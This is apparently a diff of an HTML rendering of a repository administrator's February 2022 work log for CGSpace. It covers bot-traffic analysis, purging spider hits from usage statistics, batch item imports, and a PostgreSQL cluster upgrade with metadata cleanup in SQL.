                                                                                                                                                                                                                                                                                                                                                                                                                            -    192 39832
                                                                                                                                                                                                                                                                                                                                                                                                                            -    202 32934
                                                                                                                                                                                                                                                                                                                                                                                                                            -    235 29465
                                                                                                                                                                                                                                                                                                                                                                                                                            -    260 15169
                                                                                                                                                                                                                                                                                                                                                                                                                            -    466 14618
                                                                                                                                                                                                                                                                                                                                                                                                                            -    607 24757
                                                                                                                                                                                                                                                                                                                                                                                                                            -    768 714
                                                                                                                                                                                                                                                                                                                                                                                                                            -   1214 8075
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                              +     79 24940
                                                                                                                                                                                                                                                                                                                                                                                                                              +     89 36908
                                                                                                                                                                                                                                                                                                                                                                                                                              +    100 9299
                                                                                                                                                                                                                                                                                                                                                                                                                              +    107 2635
                                                                                                                                                                                                                                                                                                                                                                                                                              +    110 44546
                                                                                                                                                                                                                                                                                                                                                                                                                              +    111 16509
                                                                                                                                                                                                                                                                                                                                                                                                                              +    118 7552
                                                                                                                                                                                                                                                                                                                                                                                                                              +    120 4837
                                                                                                                                                                                                                                                                                                                                                                                                                              +    123 50245
                                                                                                                                                                                                                                                                                                                                                                                                                              +    123 55836
                                                                                                                                                                                                                                                                                                                                                                                                                              +    147 45899
                                                                                                                                                                                                                                                                                                                                                                                                                              +    173 33771
                                                                                                                                                                                                                                                                                                                                                                                                                              +    192 39832
                                                                                                                                                                                                                                                                                                                                                                                                                              +    202 32934
                                                                                                                                                                                                                                                                                                                                                                                                                              +    235 29465
                                                                                                                                                                                                                                                                                                                                                                                                                              +    260 15169
                                                                                                                                                                                                                                                                                                                                                                                                                              +    466 14618
                                                                                                                                                                                                                                                                                                                                                                                                                              +    607 24757
                                                                                                                                                                                                                                                                                                                                                                                                                              +    768 714
                                                                                                                                                                                                                                                                                                                                                                                                                              +   1214 8075
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • The same information, but by org name:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                              -     92 Orange
                                                                                                                                                                                                                                                                                                                                                                                                                              -    100 Hetzner Online GmbH
                                                                                                                                                                                                                                                                                                                                                                                                                              -    100 Philippine Long Distance Telephone Company
                                                                                                                                                                                                                                                                                                                                                                                                                              -    107 AUTOMATTIC
                                                                                                                                                                                                                                                                                                                                                                                                                              -    110 ALFA TELECOM s.r.o.
                                                                                                                                                                                                                                                                                                                                                                                                                              -    111 AMAZON-02
                                                                                                                                                                                                                                                                                                                                                                                                                              -    118 Viettel Group
                                                                                                                                                                                                                                                                                                                                                                                                                              -    120 CHINA UNICOM China169 Backbone
                                                                                                                                                                                                                                                                                                                                                                                                                              -    123 Reliance Jio Infocomm Limited
                                                                                                                                                                                                                                                                                                                                                                                                                              -    123 Serverel Inc.
                                                                                                                                                                                                                                                                                                                                                                                                                              -    147 VNPT Corp
                                                                                                                                                                                                                                                                                                                                                                                                                              -    173 SAFARICOM-LIMITED
                                                                                                                                                                                                                                                                                                                                                                                                                              -    192 Opera Software AS
                                                                                                                                                                                                                                                                                                                                                                                                                              -    202 FACEBOOK
                                                                                                                                                                                                                                                                                                                                                                                                                              -    235 MTN NIGERIA Communication limited
                                                                                                                                                                                                                                                                                                                                                                                                                              -    260 GOOGLE
                                                                                                                                                                                                                                                                                                                                                                                                                              -    466 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                              -    607 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                              -    768 APPLE-ENGINEERING
                                                                                                                                                                                                                                                                                                                                                                                                                              -   1214 MICROSOFT-CORP-MSN-AS-BLOCK
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                                +     92 Orange
                                                                                                                                                                                                                                                                                                                                                                                                                                +    100 Hetzner Online GmbH
                                                                                                                                                                                                                                                                                                                                                                                                                                +    100 Philippine Long Distance Telephone Company
                                                                                                                                                                                                                                                                                                                                                                                                                                +    107 AUTOMATTIC
                                                                                                                                                                                                                                                                                                                                                                                                                                +    110 ALFA TELECOM s.r.o.
                                                                                                                                                                                                                                                                                                                                                                                                                                +    111 AMAZON-02
                                                                                                                                                                                                                                                                                                                                                                                                                                +    118 Viettel Group
                                                                                                                                                                                                                                                                                                                                                                                                                                +    120 CHINA UNICOM China169 Backbone
                                                                                                                                                                                                                                                                                                                                                                                                                                +    123 Reliance Jio Infocomm Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                +    123 Serverel Inc.
                                                                                                                                                                                                                                                                                                                                                                                                                                +    147 VNPT Corp
                                                                                                                                                                                                                                                                                                                                                                                                                                +    173 SAFARICOM-LIMITED
                                                                                                                                                                                                                                                                                                                                                                                                                                +    192 Opera Software AS
                                                                                                                                                                                                                                                                                                                                                                                                                                +    202 FACEBOOK
                                                                                                                                                                                                                                                                                                                                                                                                                                +    235 MTN NIGERIA Communication limited
                                                                                                                                                                                                                                                                                                                                                                                                                                +    260 GOOGLE
                                                                                                                                                                                                                                                                                                                                                                                                                                +    466 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                +    607 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                +    768 APPLE-ENGINEERING
                                                                                                                                                                                                                                                                                                                                                                                                                                +   1214 MICROSOFT-CORP-MSN-AS-BLOCK
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • Most of these are pretty normal except “Serverel” and Hetzner perhaps, but their user agents are pretending to be normal users so who knows…
                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to look in the Solr stats with facet.limit=1000&facet.mincount=1 and found a few more definitely non-human agents:
                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -439,25 +439,25 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                  • I added them to the ILRI override in the DSpace spider list and ran the check-spider-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 234 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 337 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1164 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1528 hits from scpitspi-rs in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 3050 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1683 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1129 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 534 hits from Iframely in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1022 hits from qbhttp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 330 hits from ^got in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 156 hits from ^colly in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 38 hits from article-parser in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1148 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 3126 hits from adreview in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 217 hits from 1science in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 14696
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 234 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 337 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1164 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1528 hits from scpitspi-rs in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 3050 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1683 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1129 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 534 hits from Iframely in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1022 hits from qbhttp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 330 hits from ^got in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 156 hits from ^colly in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 38 hits from article-parser in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1148 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 3126 hits from adreview in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 217 hits from 1science in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Total number of bot hits purged: 14696
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    • I don’t have time right now to add any of these to the COUNTER-Robots list…
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter asked me to add a new item type on CGSpace: Opinion Piece
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Map an item on CGSpace for Maria since she couldn’t find it in the item mapper
                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -476,22 +476,22 @@ Purging 217 hits from 1science in statistics
• Install PostgreSQL 12 on my local dev environment to start testing DSpace 6.x workflows with it:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
• Eventually I will update DSpace Test, then CGSpace (time to start paying off some technical debt!)
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full Discovery re-index on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        -real    292m49.263s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -user    201m26.097s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -sys     3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          +real    292m49.263s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +user    201m26.097s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +sys     3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Start a full harvest on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                                          2022-02-14

                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -503,17 +503,17 @@ sys 3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                        or(
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('201')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('203')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('215')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('220')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('225')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('226')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('227')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('201')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('203')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('215')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('220')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('225')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('226')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('227')),
                                                                                                                                                                                                                                                                                                                                                                                                                                         ...
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I flagged all matching records and exported a CSV to use with SAFBuilder
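For reference, the GREL filter above amounts to "flag the row if its value is exactly one of the batch IDs", since GREL's `match()` only succeeds when the pattern matches the whole string. A minimal Python sketch of the same check follows. The ID list is only the subset visible in the expression (the rest is elided there), and `is_in_batch` and the sample rows are hypothetical names and data for illustration, not part of the actual OpenRefine project:

```python
import re

# Only the IDs visible in the GREL expression; the full list is elided ("...") there.
BATCH_IDS = ["201", "203", "209", "215", "220", "225", "226", "227", "396"]


def is_in_batch(value, ids=BATCH_IDS):
    """Return True when value matches one of the IDs in its entirety.

    re.fullmatch mirrors GREL's whole-string match(); the IDs are escaped
    because they are treated as literals here (an assumption of this sketch).
    """
    return any(re.fullmatch(re.escape(i), value) is not None for i in ids)


# Hypothetical rows standing in for the OpenRefine records
rows = [{"id": "201"}, {"id": "2010"}, {"id": "396"}, {"id": "400"}]
flagged = [r for r in rows if is_in_batch(r["id"])]
print([r["id"] for r in flagged])  # ['201', '396']
```

Note that `2010` is not flagged: a whole-string match avoids accidentally picking up longer IDs that merely contain a batch ID.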
                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -521,15 +521,15 @@ isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            • I sent these 300 items to Gaia…
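For reference, the `csvjoin -c id` step above can be approximated with Python's standard library when csvkit is not at hand. This is only a minimal sketch, not what was actually run: the function name `join_on_id` is hypothetical, it assumes the two files share no column names other than `id`, and it keeps only rows whose `id` appears in both files (an inner join). If an `id` occurs more than once in the second file, the last row wins.

```python
import csv


def join_on_id(left_path, right_path, out_path, key="id"):
    """Inner-join two CSV files on a shared key column.

    Hypothetical helper, similar in spirit to `csvjoin -c id left.csv right.csv`.
    Returns the number of joined rows written to out_path.
    """
    # Index the right-hand file (e.g. the id,filename export) by its key.
    with open(right_path, newline="", encoding="utf-8") as f:
        reader = csv.DictReader(f)
        right_fields = [c for c in reader.fieldnames if c != key]
        right_rows = {row[key]: row for row in reader}

    with open(left_path, newline="", encoding="utf-8") as f_in, \
         open(out_path, "w", newline="", encoding="utf-8") as f_out:
        reader = csv.DictReader(f_in)
        # Output columns: everything from the left file, then the extra right columns.
        writer = csv.DictWriter(f_out, fieldnames=reader.fieldnames + right_fields)
        writer.writeheader()
        written = 0
        for row in reader:
            match = right_rows.get(row[key])
            if match is None:
                continue  # no matching id in the right file, so skip the row
            row.update({c: match[c] for c in right_fields})
            writer.writerow(row)
            written += 1
    return written
```

Calling `join_on_id("/tmp/2022-02-14-tac-batch3-401-700.csv", "/tmp/tac3-filenames.csv", "/tmp/joined.csv")` would mirror the last command in the block above, with `/tmp/joined.csv` standing in as a placeholder output path.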

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-16

                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -541,36 +541,36 @@ $ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        # systemctl stop tomcat7
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 10 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 12 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_dropcluster 12 main
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_upgradecluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 12 main start
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          # systemctl stop tomcat7
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 10 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 12 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_dropcluster 12 main
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_upgradecluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 12 main start
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ su - postgres
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ cat /tmp/generate-reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -FROM pg_class C
                                                                                                                                                                                                                                                                                                                                                                                                                                          -LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
                                                                                                                                                                                                                                                                                                                                                                                                                                          -WHERE nspname = 'public'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -  AND C.relkind = 'r'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -  AND nspname !~ '^pg_toast'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -ORDER BY pg_total_relation_size(C.oid) ASC;
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ <trim the extra stuff from /tmp/reindex.sql>
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ su - postgres
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ cat /tmp/generate-reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +FROM pg_class C
                                                                                                                                                                                                                                                                                                                                                                                                                                            +LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
                                                                                                                                                                                                                                                                                                                                                                                                                                            +WHERE nspname = 'public'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +  AND C.relkind = 'r'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +  AND nspname !~ '^pg_toast'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +ORDER BY pg_total_relation_size(C.oid) ASC;
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ <trim the extra stuff from /tmp/reindex.sql>
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            • I saw that the index on metadatavalue shrunk by about 200MB!
                                                                                                                                                                                                                                                                                                                                                                                                                                            • After testing a few things I dropped the old cluster:
                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                            # pg_dropcluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                            -# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
                                                                                                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-17

                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            # pg_dropcluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                            +# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
                                                                                                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-17

                                                                                                                                                                                                                                                                                                                                                                                                                                            • I updated my migrate-fields.sh script to use field names instead of IDs
                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -582,25 +582,25 @@ $ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Normalize the text_lang attributes of metadata on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                                                                                - text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                                                                                ------------+---------
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en_US     | 2838588
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en        |    1082
                                                                                                                                                                                                                                                                                                                                                                                                                                                -           |     801
                                                                                                                                                                                                                                                                                                                                                                                                                                                - fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                - vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en_US.    |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                - sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -           |       0
                                                                                                                                                                                                                                                                                                                                                                                                                                                -(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
